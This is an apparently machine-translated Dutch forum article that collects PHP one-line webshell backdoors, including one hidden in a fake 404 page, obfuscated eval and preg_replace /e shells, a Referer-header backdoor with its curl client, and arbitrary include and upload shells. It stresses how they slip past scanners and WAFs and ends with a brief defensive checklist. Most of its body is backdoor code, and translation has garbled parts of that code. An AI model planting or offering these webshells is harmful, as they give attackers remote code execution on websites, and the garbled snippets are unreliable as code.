We behandelen deze PHP-backdoorprogramma's met een leermentaliteit, en veel PHP-backdoorcode laat ons zien hoe goedbedoelend programmeurs zijn.
Krachtige PHP-achterdeur in één zin
Dit soort achterdeurtje maakt websites mogelijk,Serverbeheerders zijn erg problematisch en moeten vaak methoden aanpassen om verschillende detecties uit te voeren, en veel nieuwe schrijftechnieken kunnen niet worden ontdekt en met gewone detectiemethoden worden aangepakt.
Vandaag tellen we enkele interessante PHP-trojanen.
1. Verberg PHP-pony's met 404 pagina's:
[mw_shl_code=php, waar] <!DOCTYPE HTML PUBLIEK "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Niet Gevonden</title> </head><body> <h1>Niet gevonden</h1> <p>De gevraagde URL werd niet gevonden op deze server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 niet gevonden'); ?>[/mw_shl_code]
404-pagina is een veel gebruikt bestand op de website, en weinig mensen zullen het controleren en aanpassen nadat het algemeen wordt aanbevolen, dus we kunnen dit gebruiken om de achterdeur te verbergen.
2. Featureless verborgen PHP in één zin:
[mw_shl_code=php,true]<?php session_start(); $_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Wijs $_POST['code'] toe aan $_SESSION['theCode'], en voer vervolgens $_SESSION['theCode' uit], met als opvallend dat er geen handtekeningcode is.
Als je een scantool gebruikt om de code te controleren, zal het niet alarm slaan en het doel bereiken.
3. Super Stealthy PHP Backdoor:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
De GET-functie alleen al vormt een Trojaar;
Hoe te gebruiken:
[mw_shl_code=php, waar] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Na uitvoering genereert de huidige directory c.php een zinstrojan, wanneer parameter A geëvalueerd is, mislukte de fout Trojan-generatie, en wanneer deze assert is, rapporteert hij ook een fout, maar genereert hij een trojan horse, die niet onderschat mag worden.
Levelverzoek, code om PHP-backdeur te draaien:
Deze methode wordt geïmplementeerd met twee bestanden, bestand 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(", "+", imploderen(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Document 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset=UTF-8′);
//要执行的代码 $code= <<<CODE phpinfo(); CODE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "A=10&B=ab&c=34&d=Re&E=32&F=km&g={$code}&H=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => ONJUIST, CURLOPT_RETURNTRANSFER => WAAR, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Voer base64-gecodeerde code uit via de HTTP_REFERER in het HTTP-verzoek om het backdoor-effect te bereiken.
Het is goed om dit idee te gebruiken om waf te omzeilen.
4.PHP backdoor generatortool weevly
weevely is een PHP-specifiekeWebshell gratis software kan worden gebruikt om een verbindingsshell te simuleren vergelijkbaar met telnet. Weevely wordt meestal gebruikt voor het exploiteren van webprogramma's, het verbergen van achterdeurtjes of telnet-achtige methoden in plaats van webpagina-beheer. De server-side PHP-code die door Weevely wordt gegenereerd is base64-gecodeerd, waardoor het gangbare antivirussoftware en IDS kan misleiden. Zodra je de server-side code uploadt, kun je die meestal direct via Weevely uitvoeren.
De functies die in de backdoor worden gebruikt, zijn vaak gebruikte stringverwerkingsfuncties, en functies zoals evaluatie en systeem die als inspectieregels worden gebruikt, verschijnen niet direct in de code, zodat het backdoor-bestand de controle van de backdoor-zoektool kan omzeilen. Scannen met de web-achterdeurdetectietool van de dark group laat zien dat het bestand niet bedreigd is.
Bovenstaande is een algemene inleiding, en de relevante gebruiksmethoden worden hier niet gepresenteerd, een eenvoudige wetenschappelijke popularisering.
4. Drie misvormde PHP-trojanen van één zin De eerste:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
De tweede
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Schrijf http://site/2.php?_=assert&__=eval($_POST['pass']) wachtwoord in het keukenmes is pass.
Als je de extra gegevens van het keukenmes gebruikt, is het beter verborgen, of je kunt andere injectietools gebruiken, omdat het post-ingestuurd wordt.
De derde
[mw_shl_code=php, waar] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'toevoegen'); [/mw_shl_code]
str_rot13 ('riny') is de gecodeerde evaluatie, die trefwoorden volledig vermijdt zonder het effect te verliezen, waardoor mensen bloed overgeven!
5. Noem tot slot een paar geavanceerde PHP Trojan-achterdeuren:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Toegang"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,waar]$filename=$_GET['xbid']; include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,waar]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][naam]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,waar]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php, waar]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Samengevat kunnen deze PHP-achterdeurtjes als compleet worden omschreven; als je niet oppast, word je zeker misleid, en wat is de hoogste prioriteit van ons artikel vandaag? De belangrijkste punten staan in de samenvatting hieronder!
Hoe om te gaan met een PHP-achterdeurtje van één zin: We benadrukken een paar kernpunten, en als je dit artikel leest, geloof ik dat je geen leek bent, dus ik zal niet lang praten:
- Wees alert op beveiliging bij het schrijven van PHP-programma's
- Serverlogbestanden moeten vaak worden gelezen en regelmatig geback-upt
- Strikte toewijzing van toestemmingen voor elke locatie
- Frequente batchbeveiligingscontroles van dynamische bestanden en mappen
- Leer hoe je handmatig antivirus "Behavioral Judgment Investigation and Killing" uitvoert.
- Blijf op de hoogte, of infiltreer een actief cybersecuritykamp
- Zelfs een functie kan als regel worden gebruikt voor hiërarchische verwerking van de serveromgeving
Wij geloven dat wanneer er meer sites te beheren zijn en een grote hoeveelheid data, we redelijkerwijs enkele hulpmiddelen moeten toepassen, maar we moeten niet volledig op deze tools vertrouwen; technologie wordt voortdurend bijgewerkt en verbeterd, het belangrijkste is dat je het denken van deze krachtige achterdeurmensen leert en begrijpt, en de roloverdracht kan je grotere vooruitgang opleveren.
|